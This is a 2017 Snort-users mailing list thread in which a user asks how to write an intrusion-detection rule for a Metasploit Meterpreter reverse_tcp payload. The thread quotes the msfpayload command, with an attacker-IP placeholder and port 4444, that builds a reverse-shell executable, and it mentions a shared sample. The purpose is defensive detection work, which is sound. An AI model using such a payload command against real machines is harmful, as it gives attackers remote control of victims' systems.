[Snort-users] how to write rule for msfpayload in linux

DFIRob rd.seclists at gmail.com
Mon Nov 20 15:31:35 EST 2017


Your link has been blocked by Google Drive. In the future, please share a
zip file with the password 'virus' or 'infected' to prevent automated
removal. Also, since msf is open source, I encourage you to dig into how
they implement network traffic between the implant and the C2 server.

--rob

On Sun, Nov 19, 2017 at 2:31 AM, nguyen cao <nguyenblack1995 at gmail.com>
wrote:

> On the attacker I use: msfpayload windows/meterpreter/reverse_tcp
> LHOST=(IP_attacker) LPORT=4444 X > /root/Desktop/payload.exe (in order to
> create the file payload.exe).
> msfpayload2
> <https://drive.google.com/file/d/10MzIeyeThWHMfuhNyDJTuG3Y4QJ_qjcA/view?usp=drive_web>
> When I run the file payload.exe on the victim PC, I take control of the
> victim's system. I run Wireshark and match packets, but I do not know where
> to start in order to write a rule for this type of attack.
>
>
>
> 2017-11-19 2:16 GMT+07:00 DFIRob <rd.seclists at gmail.com>:
>
>> Hi, do you have a pcap that you want to alert on?
>>
>> On Sat, Nov 18, 2017 at 3:22 PM, nguyen cao via Snort-users <
>> snort-users at lists.snort.org> wrote:
>>
>>> Who can help me with writing a rule for msfpayload in Linux?
>>> I create the payload with msfpayload: msfpayload windows/meterpreter/reverse_tcp
>>> LHOST=/ /  LPORT=/ /....
>>>
>>> _______________________________________________
>>> Snort-users mailing list
>>> Snort-users at lists.snort.org
>>> Go to this URL to change user options or unsubscribe:
>>> https://lists.snort.org/mailman/listinfo/snort-users
>>>
>>> Please visit http://blog.snort.org to stay current on all the latest
>>> Snort news!
>>>
>>> Please follow these rules: https://snort.org/faq/what-is-the-mailing-list-etiquette
>>>
>>
>>
>